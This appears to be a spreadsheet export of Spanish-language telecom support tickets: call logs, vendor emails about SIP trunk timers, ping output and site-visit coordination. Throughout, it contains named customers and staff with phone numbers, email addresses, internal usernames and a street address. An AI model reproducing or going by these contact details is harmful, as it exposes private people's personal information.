    <t xml:space="preserve"> SE TRATO DE COMUNICAR A EJECUTIVO DE CUENTA SANDRA FUENTES 58261426 PERO NO SE LOGRO COMUNICACION, SE INFORMA A CLIENTE QUE TIENE QUE SOLVENTAR ESTE TEMA ADMINISTRATIVO CON SU EJECUTIVO DE CUENTA, SEGUN LA TAREA INDICA QUE SE BLOQUEO PORQUE ESTAN ACTIVOS PERO NO FACTURANDO. CLIENTE ENTERADO ESTARA ESCALANDO CON SU DEPARTAMENTO ADMISTRATIVO + COMERCIAL, SE PROCEDE AL CIERRE DEL INCIDENTE.
REFERENCIA: T1035939</t>
  </si>
  <si>
    <t>F4621685</t>
  </si>
  <si>
    <t>AL LLAMAR AL GDN SE ESCUCHA MUCHO RUIDO Y SE CORTA LA LLAMADA ### SE LLAMA AL  ALEX MENJIVAR-72363394 E INDICA QUE  PRESENTA RUIDO PERO SE TIENE PROBLEMA EN EL AUDIO ## SE CORTA LA LLAMADA##VIVO</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE LUCIA ROJAS-25266500   SE TIENE EN LINEA ##VIVO</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE LUCIA ROJAS AL  72363394 SE LLAMA A CLIENTE Y NO RESPONDE || SE INTENTARA LUEGO **
-ID 2001981712
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE LUCIA ROJAS AL  72363394 INDICA QUE ESTA EN HORA DE ALMUERZO QUE SE LE LLAME EN 1 HR NUEVAMENTE YA QUE QUIERE QUE SE LE REVISE EL E1 **
-ID 2001949869
**</t>
  </si>
  <si>
    <t>SE HABLA CON CLINET EALEX MENJIVAR-72363394 ##INDICA QUE EL REPORTE ES RUIDO Y SOLICITA VERIFICACION DE E1 YY CERTIFICACION##</t>
  </si>
  <si>
    <t>SE HABLA CON CLIENTE LUCIA ROJAS-25266500-  77517845   ## INDICA QUE LAS LLAMADAS TIENENE RUIDIO ## SE REALIZA PRUEBA Y EN EFECTO- DE 3 LLAMADAS 2 TIENEN REUIDOS ## VIVO ADEMAS INDICA QUE EL HORARIO DE ATENCION ES DE 7AM A 5PM</t>
  </si>
  <si>
    <t>F4621688</t>
  </si>
  <si>
    <t>PERSONAL DE BOCX YA COMPARTIÓ PRUEBAS DE TRAZADO; SE LLAMÓ A CLIENTE 55093630 PARA SEGUIMIENTO, NO CONTESTA; CRONO ANTERIOR INDICA QUE SEGUIMIENTO PARA MAÑANA  EN EL TRANSCURSO DEL DÍA.</t>
  </si>
  <si>
    <t>SE TIENE CORREO DEL PROVEEDOR QUIEN ESTA SOLICITANDO PERMISO AL CLIENTE PARA HACER CAMBIOS EN SU PBX, SE QUEDA A LA ESPERA DE LO QUE EL CLIENTE LE RESPONDA A SU PROVEEDOR.
NOE ESPINOZA &lt;NESPINOZA@ECSSA.COM&gt;
BUENAS TARDES ESTIMADOS,
COMO SEGUIMIENTO AL TEMA, POR PARTE DEL FABRICANTE NOS HACEN MENCIÓN DE LO SIGUIENTE:
"EN EL AVAYA COMMUNICATION MANAGER, LA TRONCAL DE ENTRADA DEBE TENER EL CAMPO "PREFERRED MINIMUM SESSION REFRESH INTERVAL(SEC):¿  IGUAL O MAYOR AL VALOR DE ENTRADA, EJEMPLO 1200 O 2400 EN CASO DE TRANSFERENCIA"
SI EL CM ESTÁ ENVIANDO EL VALOR MIN-SE: 180 EN LA TRANSFERENCIA, EL VALOR DE ENTRADA DE LA LLAMADA SERÍA MENOR, ENTONCES EL PROVEEDOR DEBE INVESTIGAR PORQUE EN UNA LLAMADA ENVÍA EL MIN-SE MAYOR Y EN OTRAS LLAMADA ENVÍA EL VALOR MENOR.
ACTUALMENTE Y DEL LADO DEL AVAYA COMMUNICATION MANAGER, SE HA COLOCADO UN TIEMPO DE 90 SEGUNDOS PARA EL "SESSION REFRESH" YA QUE CON ESE VALOR SE LOGRA ESTABLECER LA TRONCAL DE MANERA CORRECTA.
EL CAMBIO SE PUEDE REALIZAR SEGÚN LAS RECOMENDACIONES DEL FABRICANTE AUNQUE CORREMOS EL RIESGO DE GENERAR UNA PÉRDIDA DE SERVICIO, SIEMPRE Y CUANDO LOS VALORES NO COINCIDAN, PARA ESTO REQUERIMOS TENER AUTORIZACIÓN POR PARTE DE ELIEZER GUILLERMO JIMENEZ IBARRA Y DE NILBA ISOLINA GARCIA CHAVARRIA , PARA REALIZAR ESTA ACTIVIDAD A LA HORA QUE ESTIMEN CONVENIENTE Y QUE PREFERIBLEMENTE NO OCASIONE MOLESTIAS A LOS USUARIOS.
QUEDAMOS A LA ESPERA DE SUS COMENTARIOS.
SALUDOS.</t>
  </si>
  <si>
    <t>SE ESTA EN REUNION CON PERSONAL DE EXCEL AUTOMOTRIZ QUIEN PROCEDE A REALIZAR CAMBIOS EN SU PBX.
HTTPS://TEAMS.MICROSOFT.COM.MCAS.MS/DL/LAUNCHER/LAUNCHER.HTML?URL=%2F_%23%2FL%2FMEETUP-JOIN%2F19%3AMEETING_YTFIYTUYMGQTNZM5YS00NZM3LWIWNJGTNGFKY2FMNGI3N2Q0%40THREAD.V2%2F0%3FCONTEXT%3D%257B%2522TID%2522%253A%25227C5437CB-1F95-4268-96EC-E7C338E3C423%2522%252C%2522OID%2522%253A%252228EB29CE-5194-485B-9205-752784889E4C%2522%257D%26ANON%3DTRUE&amp;TYPE=MEETUP-JOIN&amp;DEEPLINKID=17B8E403-DDE3-43EE-96CD-1D3A508EF5C8&amp;DIRECTDL=TRUE&amp;MSLAUNCH=TRUE&amp;ENABLEMOBILEPAGE=TRUE&amp;SUPPRESSPROMPT=TRUE</t>
  </si>
  <si>
    <t>CORREO FUE ENVIADO AL CLIENTE DESDE AYER , CLIENTE  ELIEZER  INDICA QUE ENVIARA LINK DE TEAMS  EN BREVE.
1001049720
COLA:
NOMBRE: A: 55093630
NÚMERO: 55093630
DURACIÓN: 0:01:01
ESTADO: CONECTADA
DETALLES: 55093630
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ESVINPAREDES
FECHA Y HORA LOCALES: 6/07/2022 08:54:01</t>
  </si>
  <si>
    <t>SERVICIOS YA SIN PROBLEMA, SE PROCEDE AL CIERRE DEL CASO. SE ENVIA CORREO AL CLIENTE CONFIRMANDO E INDICANDO LOS CAMBIOS QUE SE REALIZARON.
ESVIN ANTONIO PAREDES SAMUY
BUENA TARDE ESTIMADOS SE REALIZARON PRUEBAS CON LOS E1
22778500 ROOSVELT
22778300 CHARCAS
22778200 PRADERA
22772800 SAN MATEO
23760300 SAN MATEO
22770300 SAN MATEO
22778400 CARRETERA
LOS CUALES LOS CORTES DE LLAMADAS AL MOMENTO DE TRASFERIR FUE SOLVENTADO, POR PARTE DE CLARO EL CAMBIO FUE EN:
SESSION INTERVAL DE 300 A 7200
PARA FUTUROS CAMBIOS DE SUS E1 PRI A SIP, DEBEN SOLICITAR QUE SE LES COLOQUE ESTE PARAMETRO A NIVEL DE CLARO.
SALUDOS.</t>
  </si>
  <si>
    <t>SE LE CONSULTA AL CLIENTE SI  REALIZARON LOS CAMBIOS EN SU PBX Y SI VA A SER NECESARIO OTRA REUNION ENTRE CLIENTE Y CLARO. SE  QUEDA A LA ESPERA DE LA RESPUESTA.
RE: SEGUIMIENTO FALLA CORTE DE LLAMADAS TRANSFERIDAS
ESVIN ANTONIO PAREDES SAMUY
BUEN DIA ESTIMADOS, QUEDAMOS A LA ESPERA QUE NOS PUEDAN CONFIRMAR SI APLICARON LOS CAMBIOS EN SU PBX  Y SI SERÁ NECESARIO REALIZAR NUEVAMENTE LA CONFERENCIA ENTRE USTEDES Y PERSONAL DE CLARO.
SALUDOS.</t>
  </si>
  <si>
    <t>SE RECIBE CORREO DEL CLIENTE Y SE LE RESPONDE, SE QUEDA A LA ESPERA DE LO QUE EL CLIENTE INDIQUE.
RE: SEGUIMIENTO FALLA CORTE DE LLAMADAS TRANSFERIDAS
¿
MICROSOFT OUTLOOK
MAR 05/07/2022 16:58
NO SE PUDO ENTREGAR A ESTOS DESTINATARIOS O GRUPOS: MONICA.CASTILLO@CLARO.COM.GT EL BUZÓN DE CORREO DEL DESTINATARIO ESTÁ LLENO Y NO PUEDE ACEPTAR MENSAJES POR EL MOMENTO. INTENTE REENVIAR EL MENSAJE MÁS TARDE O PÓNGASE EN CONTACTO CON EL DESTINATARIO DIRECTAMENTE.
¿
MICROSOFT OUTLOOK
MAR 05/07/2022 16:58
NO SE PUDO ENTREGAR A ESTOS DESTINATARIOS O GRUPOS: PERLA.ESTRADA@CLARO.COM.GT EL BUZÓN DE CORREO DEL DESTINATARIO ESTÁ LLENO Y NO PUEDE ACEPTAR MENSAJES POR EL MOMENTO. INTENTE REENVIAR EL MENSAJE MÁS TARDE O PÓNGASE EN CONTACTO CON EL DESTINATARIO DIRECTAMENTE.
ESVIN ANTONIO PAREDES SAMUY
BUENAS TARDES ESTIMADO ELIEZER, EN EFECTO DURANTE LA LLAMADA JOSUE SIAM CONFIRMO QUE APLICO EL MISMO CAMBIO A TODOS LOS E1  SIP QUE USTEDES INDICARON, ESTE CAMBIO POR PARTE DE CLARO FUE
SESSION INTERVAL DE 300 A 7200,
POR SU PARTE  EN SU PBX REALIZARON EL CAMBIO  EN EL  TIMER DE UPDATE POR LO CUAL TIENEN QUE REPLICAR ESTE MISMO CAMBIO EN SUS DEMÁS PBX Y REALIZAR PRUEBAS.
SOLICITAMOS TAMBIÉN NOS PUEDAN INDICAR COMO PROCEDER CON LOS TICKETS QUE TENEMOS, SI NOS CONFIRMARAN UNO POR UNO O NOS VALIDARAN TODOS JUNTOS AL HACER SUS PRUEBAS, QUEDAMOS ATENTOS A SUS COMENTARIOS.
SALUDOS</t>
  </si>
  <si>
    <t>CLIENTE SOLICITA UNA NUEVA REUNION PARA MAÑANA, PERO YA SOLO ES VALIDAR EL TEMA EN SUS PBX. DE PARTE DE CLARO YA SE REALIZARON LOS CAMBIOS EN TODOS LOS E1 SIP QUE EL CLIENTE SOLICITO, SE QUEDA A LA ESPERA QUE EL CLIENTE ENVIA INVITACIÓN DE TEAMS.
SEGUIMIENTO FALLA CORTE DE LLAMADAS TRANSFERIDAS
ESVIN ANTONIO PAREDES SAMUY
BUENAS TARDE  ESTIMADO ELIEZER, PERSONAL DE CONMUTACIÓN CLARO ME INDICO QUE YA REALIZO LOS CAMBIOS EN TODOS LOS E1 QUE USTEDES INDICARON, SOLO QUEDAN PENDIENTES LOS CAMBIOS QUE USTEDES REALIZEN EN SUS PBX,  PARA INICIAR LA REUNION ESTARÉ UNICAMENTE YO  Y SI FUERA NECESARIO INTEGRARÍAMOS A JOSUE SIAM.  SOLICITAMOS NOS PUEDAN COMPARTIR EL LINK DE TEAMS PARA LA REUNION A LA HORA QUE USTEDES SOLICITAN.
SALUDOS
ELIEZER GUILLERMO JIMENEZ IBARRA &lt;EGJIMENEZ@EXCELAUTOMOTRIZ.COM&gt;
GRACIAS ESVIN POR LA INFORMACIÓN, MAÑANA PODRÍAMOS REALIZAR UNA NUEVA REUNIÓN PARA REALIZAR LOS CAMBIOS EN LAS DEMÁS SEDES.
¿LES PARECE BIEN A LAS 10AM?
SALUDOS,</t>
  </si>
  <si>
    <t>F4621690</t>
  </si>
  <si>
    <t>F4621693</t>
  </si>
  <si>
    <t>CLIENTE ENVIARÁ CONVOCATORIA VIA CORREO PARA LA CONFERENCIA MAÑANA 30/06 A LAS 9 HORAS VIA TEAMS PARA QUE SE REVISE EL TEMA CON EL PROVEEDOR.
2001940617
COLA:
NOMBRE: A: 55093630
NÚMERO: 55093630
DURACIÓN: 0:07:54
ESTADO: CONECTADA
DETALLES: 55093630
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ESVINPAREDES
FECHA Y HORA LOCALES: 29/06/2022 12:08:02</t>
  </si>
  <si>
    <t>SE ESTA EN LINEA CON EL CLIENTE ELEAZAR JIMENEZ  QUIEN APERTURO 5 CASOS PARA QUE SE COORDINE PRUEBAS EN CONJUNTO CON EL PROVEEDOR POR QUE AL MOMENTO DE TRANSFERIR LLAMADAS SE LE ESTAN CORTANDO LAS MISMAS.
2001940617
COLA:
NOMBRE: A: 55093630
NÚMERO: 55093630
DURACIÓN: 0:00:02
ESTADO: MARCANDO
DETALLES: 55093630
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ESVINPAREDES
FECHA Y HORA LOCALES: 29/06/2022 12:00:10</t>
  </si>
  <si>
    <t>F4621696</t>
  </si>
  <si>
    <t>SE REVISA COLA DE CORREOS, SIN RESPUESTA DE PARTE DEL CLIENTE, SE LLAMA A TELMEX +52 55 5174 5290 ID: 2001956223
CONFIRMA SERVICIO OK, AUTORIZA CIERRE DE TKT | SE NOTIFICA A WAGNER.POLANCO VIA SKYPE | WIP</t>
  </si>
  <si>
    <t>F4621698</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SERGIO PAZ 33905455 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 2001996431 - 2001996623</t>
  </si>
  <si>
    <t>F4621704</t>
  </si>
  <si>
    <t>CLIENTE ESTA CONSULTANDO CON SU PROVEEDOR EL HORARIO EN QUE PODRIA HACER LA REUNION DE TEAMS.</t>
  </si>
  <si>
    <t>F4621707</t>
  </si>
  <si>
    <t>F4621715</t>
  </si>
  <si>
    <t>CLIENTE BLANCA XUJUR 32272056   INDICA QUE ELLA LLEGA A SITIO HASTA LAS 13:15, SE CONTACTARÁ A ESA HORA.
2001949284
COLA:
NOMBRE: A: 32272056
NÚMERO: 011 50232272056
DURACIÓN: 0:00:34
ESTADO: CONECTADA
DETALLES: +50232272056
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ESVINPAREDES
FECHA Y HORA LOCALES: 29/06/2022 12:28:36</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE BLANCA XUJUR 32272056  INDICA QUE YA ESTA EN SITIO || SE CONTACTA A GESTOR Y SE DEJA EN LINEA CON CLIENTE **
-ID 2001968878
**</t>
  </si>
  <si>
    <t>F4621718</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SR. CARLOS SOSA 55172816 NO CONTESTO, IVR ENVIA A BUZON, ID: 2001951702.</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE SR. CARLOS SOSA 55172816  INDICA QUE SOLO ESTA ARRIBA PERO POR 3G Y QUE NO LE LLEGA AL MEDIA CONVERTER COMO QUE HUBIERA CORTE DE FO SOLICITA QUE SE COORDINE LA VISITA A MONITOREO FALLAS ATM O QUE SE LLAME AL NUMERO 24207200 **
-ID 2001971182
**</t>
  </si>
  <si>
    <t>F4621719</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL 22437253 CONTESTA EL SEÑOR PABLO FERNANDEZ QUIEN INDICA QUE SE NECESITA EL NUMERO DE DETERMINANTE O NOMBRE DE LA TIENDA PARA BUSCAR INFORMACION YA QUE NO LES APARECE  INFORMACION DEL TICKET || SE NOTIFICA A GESTOR **
-ID 3001076719
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL 22433253 PERO NO RESPONDE || SE INTENTARA LUEGO **
-ID 3001022792
**</t>
  </si>
  <si>
    <t>SOLICITA QUE SE LE LLAME A  CLIENTE EDWIN SANCHEZ AL 54698117 CONTESTA EL SEÑOR RICARDO SAUL QUIEN INDICA QUE SE LLAME AL NUMERO  22433253 PARA QUE ELLOS BRINDEN NUMERO DE PR**
-ID 3001020763
**</t>
  </si>
  <si>
    <t>SE LLMA A CLIENTE 22433253  NO RESPONDE, SE INTENTARA LUEGO
-ID 3001035710</t>
  </si>
  <si>
    <t>SE LLAMA A   ESTEBAN TRANA 50625825942 INDICA QUE ESTA PENDIENTE DE INSTALACION
-ID 3001189313</t>
  </si>
  <si>
    <t>SE LLAMA A 22437253  MENCIONA QUE NO TIENE INFORMACION, SE LE BRINDA EL ID INDICA QUE TAMPOCO TIENE INFORMACION
-ID 3001189663</t>
  </si>
  <si>
    <t>**SE LE LLAMA A CLIENTE 22433253  NO RESPONDE || SE INTENTARA LUEGO **
-ID 3001065450
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE RICARDO SAUL 54698117  PARA CONFIRMAR EL NUMERO DEL PDV E INDICA QUE EL NUMERO CORRECTO ES EL 22437253
-ID 3001075413
**</t>
  </si>
  <si>
    <t>**SE LE LLAMA A CLIENTE 22433253  NO RESPONDE || SE INTENTARA LUEGO ||  **
-ID 3001075213
**</t>
  </si>
  <si>
    <t>F4621728</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE MAYRA MOLINA 56493881 SOLICITA SE LE LLAME EN 30 MINUTOS YA QUE SE ENCUENTRA FUERA DE LAS INSTALACIONES. ID: 2001951480</t>
  </si>
  <si>
    <t>CLIENTE MAYRA MOLINA 56493881 VALIDA QUE EL SERVICIO HA ESTADO OPERATIVO, AUTORIZA EL CIERRE DEL CASO.
2001969556
COLA:
NOMBRE: A: 56493881
NÚMERO: 56493881
DURACIÓN: 0:00:41
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 56493881
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: SAQITZUNUN.COJTI
FECHA Y HORA LOCALES: 29/06/2022 01:38:34 P. M.</t>
  </si>
  <si>
    <t>F4621731</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  JANY ORTIZ SE LE COMENTA QUE PERSONAL DE PLANTA INTERNA ESTABA TRABAJANDO SOBRE UN ATN EL CUAL PRESENTABA CAIDAS RECURRENTES, SERVICIO A VIVEL WAN OPERATIVO
3001018080
COLA:
NOMBRE: A: 50113355
NÚMERO: 50113355
DURACIÓN: 0:02:37
ESTADO: CONECTADA
DETALLES: 50113355
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JUAN.LOPEZS
FECHA Y HORA LOCALES: 29/06/2022 16:35:29
&lt;GNCYGTLON2D1D02A02EIM2&gt;PING  -C 1000 -S 1500 -M 30 -B  -VPN-INSTANCE  BANRURAL 10.16.203.11
  PING 10.16.203.11: 1500  DATA BYTES, PRESS CTRL_C TO BREAK
    !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
  --- 10.16.203.11 PING STATISTICS ---
    1000 PACKET(S) TRANSMITTED
    1000 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 1/2/23 MS</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ANIBAL GONZALEZ  44990369 MENCIONA QUE PR ATIENDE HASTA LAS 16 HRS POR LO QUE SOLICITA SE PUEDA VALIDAR SI PR ESPERA A PERSONAL TECNICO
-ID 2001987616</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ANIBAL GONZALEZ  44990369 PARA BRINDAR RETROALIMENTACION
-ID 2001992054</t>
  </si>
  <si>
    <t>SE LLAMA A PR JANY ORTIZ 50113355 MENCIONA QUE SI ESTARA ESPERANDO A PERSONAL TECNICO EN PR
SE CONFIRMA CON TECNICO JOSE SANDOVAL, QUEDA ENTERADO
-ID 2001988787</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL 1720 EXT 301645 NO RESPONDE || SE INTENTARA LUEGO PARA CONFIRMAR ACCESOS**
-ID 2001973286
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ANIBAL GONZALEZ AL 44990369  - 23081000  EXT 301690 NO RESPONDE ||
 SE INTENTARA LUEGO **
-ID 2001972481 - 2001972766
**</t>
  </si>
  <si>
    <t>F4621737</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE FRANCISCO CASTILLO AL 30442041 NO RESPONDE | ENVIA A BUZON || SE INTENTARA LUEGO**
-ID 2001980978
**</t>
  </si>
  <si>
    <t>F4621738</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE LUIS RIVERA AL 55662572 INDICA QUE AUN TIENE INTERFERENCIA || SE NOTIFICA A
GESTOR **
-ID 2001977659 - 2001978531
**</t>
  </si>
  <si>
    <t>SE LLAMO AL CLIENTE LUIS RIVERA SE LE INDICO QUE HAY INCREMENTO DE ERRORES EN EL SERVICIO Y QUE ES NECESARIO CERTIFICAR EL COBRE.
CLIENTE INDICA QUE YA VAN A CERRAR LA TIENDA. SOLICITA VISITA PARA EL DIA DE MAÑANA A LAS 8:00AM
3001011900
COLA:
NOMBRE: A: 55662572
NÚMERO: 55662572
DURACIÓN: 0:01:11
ESTADO: CONECTADA
DETALLES: 55662572
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 29/06/2022 16:10:06</t>
  </si>
  <si>
    <t>SE COORDINARÁ VISITA TÉCNICA A CLIENTE MAÑANA A LAS 08:00AM; SE HABLÓ CON LUIS RIVERA/CLIENTE 55662572 INDICA QUE NO ES NECESARIO TRAMITAR PERMISO, YA AVISÓ EN OFICINAS QUE PERMITAN EL INGRESO DE TÉCNICOS CLARO MAÑANA A LAS 08:00AM, SÓLO PIDE VAYAN IDENTIFICADOS.</t>
  </si>
  <si>
    <t>F4621750</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE BENJAMIN OLA 35231831 /   77671801 INDICA QUE NO LE DEJA INGRESAR QUE LE DA MENSAJE QUE NO HAY COMUNICACION CON EL SERVIDOR | SE CONTACTA A GESTOR Y SE DEJA EN LINEA CON CLIENTE **
-ID 2001951584 - 2001953750
**</t>
  </si>
  <si>
    <t>F4621763</t>
  </si>
  <si>
    <t>### CLIENTE INDICA QUE EL PROBLEMA ES A NIVEL INTERNO "" Y QUE EL PROBLEMA ES QUE UN CABLE QUE PASA POR VARIOS NIVELES ESTA DAÑADO ## CLIENTE ESCAA A NIVEL INTERNO##SE PROCEDE AL CIERRE##</t>
  </si>
  <si>
    <t>SE LLAMA ACLIENTE JOSE VASQUEZ-37729117  ## SE TIENE EN LINEA
2001957867
COLA:
NOMBRE: A: 37729117
NÚMERO: 37729117
DURACIÓN: 0:00:47
ESTADO: CONECTADA
DETALLES: 37729117
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 29/06/2022 12:57:25</t>
  </si>
  <si>
    <t>F4621779</t>
  </si>
  <si>
    <t>SERVICIO OPERATIVO Y ESTABLE, SE INGRESO AL ROUTER VÍA TELNET Y NO SE OBSERVAN EQUIPOS CONECTADOS POR PARTE DE LA RED LAN DEL CLIENTE, CLIENTE DEBE DE VERIFICAR LAS CONEXIONES FISICAS Y PATCHCORD DE SU RED INTERNA, SIN AFECTACIÓN A NIVEL DE TRANSPORTE.SE ENVIO CORREO A CLIENTE CON PRUEBAS,
JURGEN RENE BOCH CAAL
BUENAS TARDES,
ESTIMADO CLIENTE, POR ESTE MEDIO LE INFORMO QUE EL ENLACE CON ID:  922900003T DE CONSTRUCTORA CACERES &amp; MAZARIEGOS, S.A. UBICADO EN  GRANJA GERONA 1A CALLE LOTE 65 ZONA 8 SAN MIGUEL PETAPA GUATEMALA. ESTA ACTIVO Y SIN AFECTACIÓN A NIVEL DE TRANSPORTE.
RECOMENDAMOS QUE VERIFIQUEN LAS CONEXIONES FÍSICAS, PATCHCORD Y REINICIEN SUS EQUIPOS DE RED LAN YA QUE NO OBSERVAMOS EQUIPOS ASOCIADOS.
SALUDOS
0</t>
  </si>
  <si>
    <t>F4621787</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE LUIS GALINDO  59229513 - 2420 7200 EXT.2345 NO RESPONDE || ENVIA A BUZON DE VOZ SE INTENTARA LUEGO **
-ID 2001969531 - 2001970028 - 2001970247
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE LUIS GALINDO  59229513 - 2420 7200 EXT.2345 CONFIRMA SERVICIO ESTABLE AUTORIZA CIERRE DEL TICKET Y SOLICITA QUE SE LE ENVIE LAS PRUEBAS VIA CORREO **
-ID 2001999199- 2001999632
**</t>
  </si>
  <si>
    <t>F4621794</t>
  </si>
  <si>
    <t>CRONO ANTERIOR INDICA COORDINADA VISITA TÉCNICA PARA MAÑANA A LAS 11:00AM</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  MENCIONA QUE NO HAY NINGUN PROBLEMA DE ENERGIA ELECTRICA PERO AL CONFIRMAR LA DIRECCION CLIENTE CONFIRMA QUE EL SERVICIO ESTA UBICADO EN OOTRO LUGAR
SE NOTIFICARA PARA EL SEGUIMIENTO
-ID 2001983449
NOMBRE DEL CLIENTE: TRANSACCIONES Y TRANSFERENCIAS
UBICACIÓN: 3ERA CALLE 4 AVENIDA SAN LORENZO SUCHITEPEQUEZ - SAN LORENZO</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE LUIS GALINDO  AL 24207200 EXT 2345 NO RESPONDE || SE INTENTARA LUEGO **
-ID 2001975203
**</t>
  </si>
  <si>
    <t>SE LLAMA A 5B PARA VALIDAR SI LOS EQUIPOS SE MOVIERON DE LUGAR YA QUE TECNICO NO ECONTRO TELDAT DE CLARO EN EL ATN 5150, CLIENTE CORTA LLAMADA EN 2 OCACIONES
3001500513
COLA:
NOMBRE: A: 24207212
NÚMERO: 24207212
DURACIÓN: 0:01:34
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 24207212
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JUAN.LOPEZS
FECHA Y HORA LOCALES: 2/07/2022 11:46:59</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 5B ATIENDE WALTER SE VALIDA QUE ATM 5150 ESTA CON ID I447975 DE TIGO, CLIENTE SOLICITA FOTOGRAFIAS Y ESTARAN VALIDANDO INFORMACION
3001501683
COLA:
NOMBRE: A: 24207212
NÚMERO: 24207212
DURACIÓN: 0:07:12
ESTADO: CONECTADA
DETALLES: 24207212
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JUAN.LOPEZS
FECHA Y HORA LOCALES: 2/07/2022 11:57:22</t>
  </si>
  <si>
    <t>F4621800</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ALLAN QUIJANO 99786796 MENCIONA QUE SE RETIRAN A LAS 17:30 POR LO QUE SOLICITA VISITA PARA MÑANA A LAS 8:30
-ID 3001029867</t>
  </si>
  <si>
    <t>F4621815</t>
  </si>
  <si>
    <t xml:space="preserve">
EN CONFERENCIA CON CCR, Y CLIENTE SE VALIDA QUE CLIENTE SOLICITA ESPERAR 30 MINUTOS A QUE TERMINE PARTIDO PARA PODER INGRESAR, ACTUALMENTE TECNICOS A LA ESPERA
3001042405
COLA:
NOMBRE: CONFERENCIA
NÚMERO: 4818
DURACIÓN: 0:01:18
ESTADO: CONECTADA
DETALLES: 4818
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JUAN.LOPEZS
FECHA Y HORA LOCALES: 29/06/2022 18:37:36</t>
  </si>
  <si>
    <t>SE ENVIA COREOA CLIENTE CON LOS DATOS DE PERSONAL TECNICO
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: MIÉRCOLES, 29 DE JUNIO DE 2022 17:11
PARA: DLORENZANA@FENAFUTH.ORG.HN &lt;DLORENZANA@FENAFUTH.ORG.HN&gt;
